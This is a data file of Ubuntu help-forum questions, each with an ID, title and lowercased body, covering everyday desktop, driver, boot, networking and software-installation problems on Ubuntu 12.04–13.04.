283997	faience gtk theme breaks tabs	i installed this theme in my ubuntu 12.04 + unity and all tabs are definitively wrong : any idea to make this theme work properly ? thanks .
283999	weather indicator unity/12.10	as the title suggests , i am looking for a weather indicator for unity on 12.10 . i tried indicator-weather and i ca n't click apply after adding a city ( apparently i am not the only one with this problem , based on googling ) . i tried my-weather-indicator , but the ppa can not be found after adding it , so that does n't seem to work either . i know i can get some weather information via the cities scope , but that is not really what i want . is there anything else out there ( or does anyone have a fix for my problems ) ? any help is appreciated edit : i got indicator-weather kind of working by manually adding the location information using the dconf-editor . unfortunately it still can not get extended forecast info .
284002	brand new computer , usb does n't boot ubuntu w/blue-ray plugged in	this seems to be somewhat different than similar questions i 've looked through . i 'm not really a programmer , and this is my first go at using any linux build , so i 've got no clue how to troubleshoot . i just built a new desktop , with an intel i7-3770k core ( 3.50ghz , 8mb cache , lga1155 ) , 120gb ssd ( intended for os and programs ) , 1tb hard drive . i used the pen drive usb installer and an 8gb brand new usb stick to create my bootable usb stick to install ubuntu 12.10 . when i start the computer , it goes to the usb just fine , i get a screen that 's purple and blank except for an image at the bottom that has a keyboard , `` = '' , then a person in a circle . then it goes to a string of code , with the last couple of lines : [ 33.844918 ] ata8.00 : exception emask 0x52 sact 0x0 serr 0xffffffff action 0xe frozen [ 33.844950 ] ata8 : serror : { recovdata recovcomm unrecovdata persist proto hostint phyrdychg phyint commwake 10b8b dispar badcrc handshk linkseq trstatrns unrecfis devexch } [ 33.845003 ] ata8.00 : failed command : identify packet device [ 33.845021 ] ata8.00 : cmd a1/00:01:00:00:00/00:00:00:00:00/00 tag 0 pio 512 in [ 33.845021 ] res 40/00:00:00:00:00/00:00:00:00:00/00 emask 0x56 ( ata bus error ) [ 33.845060 ] ata8.00 : status : { drdy } [ 33.845073 ] ata8 : hard resetting link i can provide any other information that would make this make sense . : ) edit : i tried this with 12.04 also , with the same error . the line just before this block is : [ 4.679684 ] sd 8:0:0:0 : [ sdc ] attached scsi removable disk i started unplugging things that were n't the ssd ( i.e. , the 1tb drive and the blue-ray ) and the blue-ray seems to be the problem , but i do n't understand why it caused an error . it 's not even on the boot-list .
284007	what are some good software for creating lecture-like videos ?	i want to make videos like the ones in this playlist : https : //www.youtube.com/watch ? v=vzxcq2fn-z0 & list=pl8dc1113adb63358e & index=1 where i can write stuff and talk about stuff at the same time . my first instinct was to shop around for a pen-tablet i can use to do the writing , but then i realized i did n't know what kind of software i would need to make `` pen-table videos '' and whether such software would be compatible with the specific pen-table i would buy . so those of you who know how this could be done on ubuntu , what are the ( software and compatible hardware ) tools i would need to make videos like that ? thank you !
284008	how can i change the default location of ubuntu one folder in ubuntu ?	i am having difficulty in relocating the ubuntu one folder . i have an ssd+hdd setup and i want to move this folder to the hard disk drive so that will save some write times for my ssd .
284009	re-run the auto dhcp configuration	i need to re-run the network configuration , as everything has changed . how can i re-run the auto-configuration ? this is on 12.04 server
284010	how do i specify an ami in juju ?	this solution no longer works how to specify ec2 instance types for different services in a charm ? since using the default-image-id option in the environments file has been deprecated.it mentions in the documentation that we can use constraints but what should be the key . i tried different ways like juju bootstrap -- constraints `` image-id : ami-xxxxxxxx '' juju bootstrap -- constraints `` default-image-id : ami-xxxxxxxx '' juju bootstrap -- constraints `` ami-image-id : ami-xxxxxxxx '' but it did n't work . can someone help me with this ?
284017	openvpn-as on debian server and ubuntu 12.10 client	i recently signed a vps ( openvz / debian 32 bits minimal ) , installed openvpn-as ( access server ) , and successfully connect to it , however i have a few doubts . to make it clear , i will explain how i installed openvpn-as and what steps i made . enabled tun/tap and ppp on the solusvm interface updated debian installed openvpn-as following this guide : http : //docs.openvpn.net/how-to-tutorialsguides/virtual-platforms/install-openvpn-access-server-on-linux-debian-6/ added two users following this guide : http : //openvpn.net/index.php/access-server/docs/admin-guides/216-how-to-add-users-to-your-openvpn-access-server.html login with the created user , downloaded the `` client.ovpn '' file and login with it , using the command : sudo openvpn -- config client.ovpn that 's pretty much what i did . everything works , but there are some catchs . i opened the ports 443 ( tcp ) and 1194 ( udp ) , in both , router and client system ( which is ubuntu 12.10 ) , and configured deluge and transmission to use the 1194 port . when the vpn is turned off , the tests on both programs shows that the port is open , however when i connect the vpn , the port appears closed on the tests , and here is the catch : deluge and transmission connects only trough tcp port , and the 1194 port of the vpn is udp only . that 's what brings my number one question : what i should do to open the 1194 port on the vpn ? it 's possible force deluge or transmission to use udp port ? my second question is simpler ( i think so ) . as i said before , i can connect to the vpn using the command `` sudo openvpn -- config client.ovpn '' , the downside is that it 's necessary keep the terminal open , i 'd like to connect trough the graphical interface , typically : click on the network manager on the top bar > go to vpn connections > select the connection > and done . but i dunno how to do this , and that 's my second question : how can i export the `` client.ovpn '' configurations or setup the connection through the graphical interface ? i use ubuntu for an year and half , and i consider myself an intermediary user , however , i 've never played with vps and openvpn-as before , so i 'm a totally noob on the subject . i have googled my doubts , but most tutorials are openvpn based , and not openvpn-as , and apparently they are quite different . i hope that my post it 's clear enough , and sorry about my english . any help would be appreciated , thanks !
284018	is there a way to make ubuntu `` forget '' a network connection ?	is there a file or something that holds the data for the internet connections ?
284021	manually do a `make install`	i just built a large program that had some other programs in the source tree . make install just installed the main program , but i want to install all of the sub-programs that were built as well . is there a way to do this ? note : by install i mean that i can type it from any shell , or through any program ( though really i only care about make ) and it will run .
284022	my user ~/bin folder is not working	i 'm running 12.04 i have two files /usr/bin/uim-tomoe-gtk ~/bin/uim-tomoe-gtk the first is the tomoe kanji program the second is a script that runs kanjipad instead # ! /bin/bash exec kanjipad $ @ exit 0 i expect to now be able to type uim-tomoe-gtk into the terminal and get my kanjipad application to start up . but the uim-tomoe-gtk program comes up instead . what am i doing wrong or what information do i need to provide ?
284023	why does bluetooth connect but not transmit any audio ?	it connects , but then i do n't get any audio in pulse audio or in steam 's mic settings . i do n't understand why this is so hard . i can get it to work on my ps3 or mac with no trouble . i have a plantronics 2xx and ubuntu 12.10 . what can i do ?
284030	ubuntu 12.10 broadcom wireless wo n't work	okay , i just installed ubuntu 12.10 today , replacing windows 8 and erasing all of my files ( correctly , i hope . darn windows 8 ) , and i was having some fun with it . i entered some code into the grub to be able to change my screen brightness ( it was only one line and nothing went wrong ) , and was about to reboot until a message appeared on my screen saying i had 300-something updates to install . since i had heard users say to do this with a fresh install , i clicked install , and rebooted my computer . before that , my wireless worked fine . once it booted back up , everything seemed to work as i had hoped it would ; i could adjust the brightness , i could browse my computer , etc . one thing that did n't work , however , was my wireless internet . when i click on the internet icon in my toolbar , it says that i am disconnected from a wired network , enable networking is on , and there 's nothing to do with wireless connections in the menu ( except vpn connections ) . i then hooked it up to the internet with an ethernet cable , and it would n't connect to that either . my internet works fine for everything else in my house , just not my laptop . what it looks like is that my laptop thinks i need to be connected to a wired connection and that i 'm disconnected , because there 's no `` wireless '' tab in my network settings , only `` wired '' and `` network proxy '' . i have an acer aspire e1-431-2644 laptop with a broadcom bcm4314 wireless lan controller . someone please help !
284038	unable to install gnome-shell-extensions due to unmet dependencies	when i try to install gnome-shell-extensions i get unmet dependencies error : sudo apt-get install gnome-shell-extensions reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell-extensions : depends : gnome-shell ( < 3.6 ) but 3.6.0-0ubuntu2 is to be installed e : unable to correct problems , you have held broken packages . how do i resolve this ?
284040	need to remove metasploit from my ubuntu 12.10 system	tonight i installed metasploit in my ubuntu 12.10 it did not work properly , so i removed it by executing the following command in terminal sudo rm -r /opt/metasploit now when i try to re-install in , it says this service script file exists click here to view screenshot how do i remove it properly ? i am brand new to ubuntu
284050	how to open a desktop shortcut from commandline	i created a eclipse.desktop and locked it to unity launcherd , when i double click on it on desktop , the eclipse was launched just like launching from unity launcher . but if i start it from command line by `` path/to/eclipse '' , the unity launcher will create a new icon in the launcher bar . how can i avoid this ? is there a command to open the desktop launcher just like double click on it ?
284051	save and restore window positions	here is my configuration : ubuntu 12.04 ( with unity ) laptop external screen to use the laptop in dual screen mode several windows spread on both screens and on 4 workspaces when i have meetings i unplug the screen from my laptop to take the laptop to the meeting room , so all the windows are re-positioned to fit in one screen only . after the meeting , when i plug it back to the external screen , i need to manually move all the windows back in place . is there a way to save and restore the windows , so that i do n't have to do this manually everytime ? a script with save/restore options would be great ! thanks ! note : i do n't think this is a duplicate of `` how do i save sessions or reopen last-used applications ? `` , since i keep my computer turned on ( the solution explained in the other post is about using an hibernation tool tweak ) . note 2 : i found this script , but it does not work . edit ( 2013-06-03 ) the tool wmctrl can help to get and set windows positions . i created a shell script with it , but there is a known bug in unity which makes it impossible to use there . even on xfce the result is random sometimes ...
284052	i want to install 12.04lts 64bit on hp z820 . will there be any problems ?	i am considering the purchase of hp z820 . i want to install 12.04lts 64bit . z800 is given in the hardware support information . z820 is not written yet . please tell me if you know how it can be used in z820 .
284057	adding my own dependency to a quickly app	i have a paid app i 'm getting ready to release on the software center but i need to add a package as a dependency . the problem is that i have to package the python module to a *deb and it is not included in any other repository that i know of . the module in question is pygal . will that work with a paid app ? i am hoping to making the app open-source , so putting it up on launchpad is not an issue for me . how would i go about this ? what would i need to do before i submit my app to the software center ? for reference : my app is made with python 2.7.x , gtk3 , and the ubuntu quickly tool . thank you for any and all assistance .
284066	alienware - webcam - mic do n't work	i have alienware m14x r1 laptop . i used ubuntu 12.10 . anybody know how can i install the webcam and the mic . i would like use with the skype , but the system do n't find the mic and the webcam . thanks !
284072	no sound on a clean install ubuntu 12.10	i 'm new here , in fact im new on the linux world . i 've had some issues with ubuntu . nothing that i could n't managed to fix . but i 'm having this problem with sound . the first clean install i made sound worked perfect with pulseaudio eq , untill i installed some pluggins for tuxguitar ( midi sound , etc ) . and then my speakers just stopped working . i did a reinstall of ubuntu 12.10 thinking it will fix the problem and it did . i installed pulseaudio and it was working fine , but 2 days later i got the same problem . i 've been searching through google and some threads here but i ca n't find the solution for my exact problem . and i 've tried everything . i 'm adding a screen capture of sound settings in wich there 's no sound drivers on the list ( it had , but not anymore ) .. as you can see it 's in spanish , but its only for illustration purposes ; ) i have a hp laptop . i appreciate any help !
284074	why does ubuntu gnome recommend make ?	running apt-cache depends ubuntu-gnome-desktop lists , among other things , gnu make as a recommend . apt-cache depends gnome does n't list make . why ? it does n't seem like make and gnome would be in any way related ( apart from their origins at gnu , if i 'm not mistaken ) .
284077	new to ubuntu , trying to install and run wow mop & lol	i am new to ubuntu linux , just came from windows 7 after a recommendation from one of my guild mates on gw2 . sadly i should have grilled him more on how to install all of the games and run them . i have spent a couple days now trying everything from wine , to playonlinux , to q4linux , virtualbox , etc and running random stuff that i do n't even know on the terminal . i have gotten league using playonlinux as far as installed but it freezes at 33 % update . i am using ubuntu 12.04 because 12.10 was giving me a blank screen with just a mouse pointer and my background when i switched to my proprietary nvidia 210 geforce video card , but 12.04 did not have a problem switching over . well if anyone knows of a good guide to tell me how to install and run wow mop using the client off of battle.net and/or a league of legends guide as well i will be eternally grateful ! well , i am off to keep searching through google and learn more since i am determined to learn this os . guide to install and run wow and lol please ? new to ubuntu 12.04 .
284082	use encrypted home between two ubuntu	i have an encrypted `` /home '' partition separated from `` / '' partition using ubuntu12.04 . now i want to install ubuntu13.04.can i share that `` /home '' partition as ubuntu13.04 's `` /home '' and use it for these two ubuntu ? if it 's possible , i should do it during ubuntu13.04 installation ?
284083	where are proxy settings stored in ubuntu 12.10 ?	i was searching hard through all the forums , but could not find an answer on my question . i 'm writing a desktop application and i want to auto-detect proxy settings on recent ubuntu . there are many tutotials about how to set up the settings via gui : where are the system-wide proxy server settings ? where are the proxy settings saved ? how do i set systemwide proxy servers in xubuntu , lubuntu or ubuntu studio ? where to set proxy ignore list ? but no suggestions of how to find already defined settings . this topic describes , how to set the proxy settings via command line tool gsettings : http : //stackoverflow.com/questions/10234872/changing-system-proxy-settings-in-ubuntu-12-04-from-terminal but still no information about where it is stored . as far as i understand , gsettings stores all the settings in ~/.config/dconf/user . if true , and if it also stores proxy settings there , then is there any way for an external custom application to retrieve these settings from this file ?
284090	an ( gui ) application like lan surfer or advanced ip scanner in ubuntu ?	is there any ( gui ) application like lan surfer or advanced ip scanner in ubuntu 12.10 to find out shared folders over lan ?
284092	error while installing cmake for avogadro	while trying to add extenisons in avogadro , i have installed all the pre-requisites required- cmake , eigen , openbbel , qt.i am following this link how do i install avogadro from source after receiving the error below ? have reached till following steps : create a build directory in the package source directory . mkdir build cd build configure the build system cmake ../ after writing this cmake ../ i am getting following error : 'cmake ' is not recognized as an internal or external command , operable program or batch file . kindly help me where i am wrong .
284097	extending the size of ubuntu partition	i have a computer which have windows 7 , ubuntu 10.04 and ubuntu 12.10 respectively . this is my partition table the 21 gb ext4 is the primary partition of ubuntu 12.10 and 18 gb ext4 is of ubuntu 10.04 . now i want to uninstall ubuntu 12.10 and add this space to ubuntu 10.04 . how can i do this ? since i use the grub of ubuntu 12.10 is it possible to do without harming this boot-loader ?
284104	xubuntu transparent buttons in the panel	i would like to remove the color behind the buttons inside the xfce pannel : i tried to modify the file /usr/share/themes/greybird/gtk-2.0/apps/xfce-panel.rc , and i came with a strange white behind the buttons , i would like to make it transparent . i think i only have to work with this part of the code : style `` window-buttons '' = `` theme-panel '' { xthickness = 3 ythickness = 3 bg [ active ] = @ bg_color_dark bg [ prelight ] = @ bg_color_dark bg [ selected ] = @ bg_color_dark fg [ normal ] = @ bg_color_dark fg [ active ] = @ bg_color_dark fg [ prelight ] = @ bg_color_dark engine `` murrine '' { contrast = 0.0 gradient_shades = { 1.0 , 0.9 , 0.8 , 0.7 } roundness = 0.5 reliefstyle = 0 textstyle = 1 text_shade = 0.2 } } what should i modify ?
284106	where did the lockscreen clock go ?	i am using raring dailies , and one thing that my eyes liked was the lockscreen . i really liked the clock . a simple thing , but still really good ? now it is suddenly gone . did they really remove it from raring ?
284111	what kind of harware configuration choose for a game-oriented ubuntu pc ?	i am considering buying newer hardware for my ubuntu-only box . the main purpose of the pc is gaming , mainly humble bundle games , some old windows games with wine and web-based games ( the facebook kind ) . none of these games require huge hardware power , but still , a smooth experience would be nice . the first issue is : how much ram should i install ? corollary : should i install a 32 or 64 bits system ? i fear that as much memory as 8go wo n't be supported under 32bit , but i also fear to run into software problems with a 64 bits system ... second question ( but i believe it has always been asked many times ) : which graphic card manufacturer offer better support these days ?
284118	why does n't gnome-online-accounts accept a google `` application specific password '' ?	i use 2-step verification with google , so when giving permission to gnome-online-accounts to access my google account , i have to type in the authentication code as well . that 's just fine , it 's how things are supposed to work . however , every so often my login would be reset and i 'd need to re-enter everything . so , i tried to create an application specific password for use with gnome-online-accounts , but it wo n't accept it ; it 's telling me to use my account password instead . anyone knows why that is or -- more importantly -- if there 's any way of changing the way it works , or otherwise save my google-credentials with gnome-online-accounts under 2-step verification ?
284121	windows 7 to ubuntu - erased data	i am quite new with ubuntu and i am not that good with computers at all . i had windows 7 , however due to some problems i did n't like that operational system because of that i decided to install ubuntu . my problem is : before installing ubuntu via usb drive , it gives a chance to the program to be tested through it . however , by mistake , i started the installation of the operational system without giving any directory . as you all know windows has two partitions `` c '' - where the system is written and `` d '' - the hard driver . by begging the installation my entire information and the drivers `` c '' and `` d '' were deleted . furthermore at the moment instead of showing `` c '' and `` d '' it shows up one partition with the entire memory of the computer . at that point by stopping the installation of ubuntu , the computer does not have any operational system only the bios ( which i am not quite sure what it is ) . furthermore the computer is running at the moment by using the ubuntu operational system installed on the usb . since it happen me that accident there was nothing over-saved on the computer . my question is : could it be restored the partition `` d '' ( as a partition ) or at least the data within that partition ? if you are going to ask me did i made a backup on some external hard , the answer is `` no '' . because of that please if some one knows how to restore the lost data to help me . i do believe is still possible to be saved . if you have any further questions please do not hesitate to ask .
284123	why does skype hang randomly when talking with somebody over it ?	from a couple of days i am facing a problem with skype . when i 'm talking with somebody , after 5 , 10 or 30 ( randomly ) minutes it just hangs up . i have this problem with skype 4.1.0.20 and 2.1.0.81 . i 'm using xubuntu 12.10 64-bit . i 've tried to use emulator and run skype for windows ( 3.8 ) , but i ca n't log in using that . how do i resolve this issue ?
284126	unity crashed , ctrl + alt + t not working , logonscreen bland	initially i realize this is n't going to have all the information needed so one of the first things that would be good is getting advice on how to obtain the relevant debug logs or ... how to actually find my terminal now . i was previously using 12.10 fairly happily , i had some kind of repository update error which initially resulted in being unable to update anything due to ( i think i remember this right ) some corrupt or missing packages . after a bit of fiddling this all seemed to go away with the exception of a red do not entersign which then hung around in my top right hand unity bar for a while . so i trundled on and happily ignored it all for about a month . however yesterday , i went to update and something went pretty wrong . to my eye unity seemed to crash , the launch bar disappeared , the top bar disappeared , ctrl+alt+t stopped working . i could bring up a new browser window using the f keys , and later discovered i could take it out of graphical mode to access some form of terminal . this even went through to the logon screen which held a similar kind of look , but now with incorrect fonts , inconsistent transparencies and apparently highlightable text . very odd . i figured i 'd uninstalled unity somehow , went out of graphical mode , sudo apt-get install unity ( which did in fact appear to be missing ) . reinstalled it successfully but then ... still wo n't . my plan b was to upgrade to 13.04 ( i figured this might paste over the cracks i seemed to be working so hard to develop ) . i managed this , rebooted but the problem persisted . launcher has returned now although the dash search seems unable to find the majority of installed programs . ctrl+alt+t is still absent ( which is the most scary for me as my entire working knowledge of linux centers around cunningly googled terminal commands ) . gnome appears to be the default choice for browser and top bar . basically everything looks like this : can anyone tell me how i might have managed this ( would be nice not to do this again ) . what therefore caused it how to repair it i 'd prefer not to have to reinstall my system as there 's files poorly organized everywhere and i 'm not sure what i might be nuking . also all of the above reoccurs consistently no matter how many times i go about restarting ... a beautiful mess .
284134	intel desktop mothermoard with integrated graphic . showing lvds n vga , that i cant configure	have intel motherboard . graphics integrated . ubuntu 12.04 showing to monitors , lvds n vga connected , but i have only vga . and ubuntu think that my monitor can show fullhd but really it can only 1280*1024 . and vga display was automatically configured to 1280*1024 , lvds - fullhd . and i can see just left half screen on a display . when i 'm trying to disconnect lvds - have a black screen . when i 'm trying configure any resolution on any of this displays have an error or black screen randomly . xrandr and manipulation with it , couldnât help , just a black screen once i 'm trying to set 1024*768 on vga display and have a normal screen but very big fonts and icons . in bios i can only turn off integated graphic and lvds . but on motherboard no any pci or pci-ex . so i wan na set resolution to 1280*1024 . thank for any help .
284139	should recursive shell script lock up the system ?	i made a typo and ran my shell script recursively . example : # ! /bin/bash # filename : kill-me-please.sh ./kill-me-please.sh this caused my system to become unresponsive and all i could do was a hard restart . tried same on macos and it was able to detect this problem and terminated the script with an error . i think an operating system should be able to handle such a situation . is this a bug ?
284141	problem with ubuntu 12.10 as it is not showing up in boot menu	i installed ubuntu 12.10 alongside windows 7 . i alloted 25 gb for it . it installed well but when i restarted again i dont get to select windows 7 or ubuntu . it directly boots to windows . when i put the ubuntu cd , it tells that windows 7 and ubuntu are both installed and if u want to reinstall ubuntu . i tried that but again i dont get to select windows or ubuntu . please help.. new to ubuntu
284142	how can i access additional channels on my sound card through pulseaudio without kludges ?	the pulseaudio faq shows how to explicitly load an alsa sink module with a channel map . this works , but also involves disabling the device autodetection modules , which i do n't want to do . there is , in the `` sound '' settings , a `` mode '' option for each output device that appears to configure the channel map pulseaudio uses for that device . it has options such as `` analog stereo output '' and `` analog surround 5.1 output '' . this seems like the way to go if the goal is to not break the default configuration , which for the most part , works really well . the issue is that my speakers really are just stereo , but i still have 6 more outputs i 'd like to use somehow . i suppose they could be exposed as additional sinks . or , if i can get these additional channels exposed as `` aux0 , aux1 , ... '' , i can use module-remap-sink to make them appear as additional sinks . i also have eight analog inputs and 2 digital inputs , and no `` mode '' setting seems to expose them all . so the question is : where are these `` modes '' configured ? or , are there any other good solutions to this problem ?
284147	xserver sometimes fails to start	i 'm having problems with my xserver sometimes failing to start . it does n't happen consistently , but when it happens , instead of showing the login screen i get some vague one-line error message about some service failing to start ( ca n't remember exactly what it says now , and it 's not copy-pasteable ... ) the following error message : ** ( plymouthd:313 ) : warning ** : command line `dbus-launch -- autolaunch=56a6ab7418a994dcd756ff100000002 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n for those of you too lazy to scroll : the line ends with autolaunch error : x11 initialization failed . the only way to get anything done is to ctrl+alt+fx to one of they tty terminals , which after login proceeds to tell me ( once or more twice ) that i failed to connect to x server , and refer to /var/log/xorg.0.log for details . when this happened just now , grep /var/log/xorg.0.log -e ee gave me this : ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 3.936 ] initializing built-in extension mit-screen-saver [ 3.998 ] ( ee ) intel ( 0 ) : [ drm ] failed to open drm device for pci:0000:00:02.0 : no such file or directory [ 3.998 ] ( ee ) intel ( 0 ) : failed to become drm master . [ 3.998 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 3.998 ] ( ee ) [ 3.998 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 3.998 ] ( ee ) i login , and reboot . usually one reboot is enough to get it working , but sometimes it takes two or three . i beleive this is caused by some service not terminating properly when ubuntu quits on system shut down , and - since i have had other problems with it as well - i would n't be surprised if it 's related to my graphics cards ( i have a laptop with an nvidia g550m and an intel integrated card ) , but i have no idea where to go from here . how do i figure out exactly what caused the problem ? is it likely to be a bug somewhere , or is it due to an error of mine ? update : as suggested in the linked-to bug report i tried restarting lightdm from the tty terminal , and that got me a login working login screen . the bug report talks about this behavior being caused by a race condition at startup , so that not all required devices are available when lightdm starts ( see e.g . comments # 23 and # 48 ) . most of them involve changing /etc/init/lightdm.conf in some way as to either prevent the race condition by stalling ( e.g . sleep 2 ) , or respawn if the first attempt crashes ( and hope the second attempt is delayed enough to succeed ) . is a workaround like that `` update safe '' , or will it be overwritten when lightdm is updated ? is there a better way to work around ( or even fix ) this ?
284160	how are modules loaded at boot	if i do `` lsmod '' i get a long list of loaded modules . which file lists the modules to load at boot time ? i 've seen pointers to /etc/modules but in my case it only contains `` lp '' and nothing more . thanks joe
284162	specto says `` the network connection seems to be down ''	i just installed specto on lubuntu 12.04 . it shows the message `` the network connection seems to be down , network watchers will not check until then '' . what should i do ? my network connection is not down .
284167	dual boot ubuntu 12.10 and windows 7 64-bit - separate internal hdds - grub rescue error when second hdd removes	i have successfully installed ubuntu 12.10 on a second internal hdd on my dell box ( win 7 being on the other hdd ) . initially had to run boot repair to get the grub menu to display on boot up - after that all runs fine ( no matter which hdd i select to boot from , the machine shows the grub menu on startup ) . problem : when i remove my second hdd from the box and start up the machine ( leaving the win 7 hdd in ) the grub menu fails to show and i get a `` grub rescue > '' prompt and a device not found ( or similar ) message . how can i set the machine up so if the second hdd is removed ( or has failed ) i can still boot into win7 either directly or via a functioning grub menu ( that would only give me a fail message if i selected `` ubuntu '' from it because that disk has been removed ) ?
284174	`` the system is running in low-graphics mode '' on virtualbox running in windows 8	i know this question has been asked multiple times but i could n't find a solution . i tried installing ubuntu 12.04.2 on oracle virtualbox running on a windows 8 pro machine . but i faced a `` the system is running in low-graphics mode error '' i even tried the live cd and it gave the same error . how do i fix this ? please help .
284175	how to access windows 7 partitions like d : / and e : / ?	i have ubuntu 12.04 installed on my pc . i can not access the contents of my hard disk which contain windows old files .
284176	ubuntu 11.10 / 12.04 installation freeze - hm67 chipset + ssd intel 335	i upgraded hdd to intel ssd 335 in my laptop ( dell vostro 3750 , chipset hm67 , latest version of bios a14 ) and i can not install ubuntu - i tried three different versions : 32bit 11.10. and 12.04. and 64bit 12.04 . ubuntu cd boots , then there is welcome screen where i select english language and i confirm installation and then i see only underscore on blank screen - nothing happens after 10min . is there any option to choose special hdd driver ( i remember that windows installation does have option to press f6 in pre-installation and you can then install custom hdd drivers ) . i tried to install windows 7 and installator asked for ssd driver , is there any hope for ubuntu installation ?
284177	how do i fix this vaapi error with an intel card ?	how do i fix the error shown below : the output of vainfo : libva : va-api version 0.32.0 libva : user requested driver 'i965' libva : trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so vainfo : intel_driver.c:58 : intel_driver_init : assertion `dri_state- > driconnectedflag == va_dri2 || dri_state- > driconnectedflag == va_dri1 ' failed . card information via lspci : 00:02.0 vga compatible controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller flags : bus master , fast devsel , latency 0 , irq 44 memory at fea00000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at dc00 [ size=8 ] memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] memory at fe900000 ( 32-bit , non-prefetchable ) [ size=1m ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 kernel driver in use : i915 00:02.1 display controller : intel corporation atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller ( rev 02 ) subsystem : intel corporation device a001 flags : bus master , fast devsel , latency 0 memory at fe880000 ( 32-bit , non-prefetchable ) [ size=512k ] capabilities : [ d0 ] power management version 2
284178	certain xubuntu graphics persist on ubuntu	i recently installed the xubuntu desktop environment on my ubuntu machine . it 's nice , but i switched back to ubuntu as by default desktop environment . but when i change the volume or brightness , the hud icons are still from the xubuntu theme . also , when i shutdown , the splash screen says xubuntu . i 'm quite sure that i am in fact running ubuntu : $ echo $ desktop_session ubuntu and in /etc/lightdm/lightdm.conf user-session=ubuntu
284180	trouble installing parallels tools on ubuntu	i 've installed ubuntu on win 8 parallels workstation extreme , however ca n't figure out how to install the parallels tools . can anybody help please ?
284182	bumblebee configurator gui set-up	installed bumblebee configuator gui . i choosed `` nvidia '' driver and `` exit at quit '' thing to test it . it saved . but how do i know its really nvidia driver that 's in use ? the other option was `` nouveau '' , this did n't work , got `` nouveau does n't excist '' . what 's that all about ? should i write something else in `` nouveau '' tab ? for kernel driver ? its now just `` nouveau '' and xorg config file is xorg.conf.nouveau ... in system setting its show on graphic : intel速 ivybridge mobile i think that 's normal whatsoever , dont think there will be anything else there.. but the intel hd graphic card is found , when lspci in terminal ( nvidia too ) .. any tips ? !
284183	sound blaster recon3d not working	i installed ubuntu 12.10 on my computer and i 'm totally new to ubuntu . i can not get my sound card to work , it 's a sound blaster recon3d . i read that this card now has support on this ubuntu version ( hda creative ) . here what happens : sometimes when i turn on the computer , it does not make any sound at all , but ubuntu detects it , i can configure the sound settings . sometimes when i turn on my pc , every time a sound is played , i can hear only white noise ( a realy loud noise ) coming from my speakers and headphnoes . i tried to find something on the internet but i only found a solution that works for hda intel cards . as a work arround i 'm using my hdmi audio that comes from my nvidia video card ( gtx570 ) . thanks every one !
284184	can i keep my files intact while upgrading ubuntu	i am planning to upgrade to ubuntu 13.04 from 12.10 when it is going to be launched on 25 april . my files storage memory is 300gb and i do not want to buy another external hdd to create a backup and save hours creating another backup . there is another question in ask ubuntu with the same doubt but the answer in that question had made me lose all my data while upgrading to 12.10 from 12.04 earlier in the year . how can i do the distro upgrade while keeping my files intact with a guarantee .
284186	how to remove drive encryption ?	i have a new win8 laptop that has an encrypted ssd . i ca n't install ubuntu until i remove the encryption . can i do this without involving the manufacturer and voiding my warranty ?
284191	my pc works at high performance due to ubuntu 12.10	i have a dell pc . it is have two graphics card ( 4100 and 7730m ) . i used solves on internet sites but then borders and desktop menu disappers . sorry for bad english . please help me !
284194	missing operating system single boot ubuntu on mac	i wanted to replace mac os x with ubuntu completely so i put the ubuntu .img on a usb drive and ran it and chose the replace osx option in ubuntu 's install menu . i realize this was a stupid way of going about trying to achieve this . when i try to boot it says : missing operating system . i am currently typing this from ubuntu via the : try ubuntu feature . according to gparted i have 3 current partitions : fat32 ext4 linux-swap the properties for each of those partitions indicate that only the linux-swap partition is `` active '' while the others remain `` unmounted '' . i believe it is ext4 that holds the ubuntu installation because gparted indicates that it has something installed on it , it is the largest partition and the other partitions have nothing on them . if there is anything i can run in terminal to give you more helpful information , please let me know . thank you . i have tried making a new partition table and then reinstalling ubuntu , but when that happens it still does not show anything as bootable and i will get the white screen but then , next , instead of getting a black screen that tells me there is no operating system , i get a flashing folder icon with an `` x '' in it .
284198	can i just buy a landscape server license ?	i want to purchase landscape , but i have yet to get my questions answered . i have about 400 ubuntu 12.04 laptops and 1 ubuntu 12.04 server . do i have to purchase a landscape client licence for each of the 400 laptops , or can i just buy 1 server licence to control all 400 laptops ? any help help would be great .
284200	computer failed to boot	i am using windows 7 home premium . the computer failed to boot this morning givng me a black screen with prompt just flashing . i beleive the hard drive is about shot . i have carbonite as a backup , but i am wondering if installing ubuntu would help me get my os up and running so that i could transfer files to a different computer ?
284202	chromium does n't play sound	i have chromium installed on ubuntu 13.04 , but aside from flash things , it seems i ca n't get a sound out of it . for instance , i installed an extension , speakit , which is supposed to read paragraphs aloud , but i get no sound out of it . the test includes listening to an audio file , i do n't get anything out of that either . i do hear sounds when played by youtube , which makes me believe that the computer 's sound itself is n't a problem , only chromium 's ( because flash makes sounds ) . i do n't hear sounds the browser plays ( like google translate 's speak ) . what can i do to troubleshoot ? what could be the problem ? when looking in the sound > applications submenu , it does n't even show up there . when i play a youtube video , it does show . example of what happens when youtube video is playing
284205	does installing a kde application under ubuntu mean more cpu load and/or memory usage even when it 's not running ?	the title says it all actually . there might be one or two kde apps that i might prefer to the gnome alternative . i 'm not afraid of having to install many kde packages ( libs , etc . ) which might take considerable amount of disk space . i 'm not afraid of having to use some additional packages ( libs , etc . ) , probably meaning more cpu load and/or memory usage than its gnome equivalent , when that application is running either . but i 'm afraid installing a kde application might entail some kde software constantly being loaded and running in the background every time ubuntu starts , even when that application is not being used . so , i will very much appreciate an answer from people who really know and who really have experience on this subject .
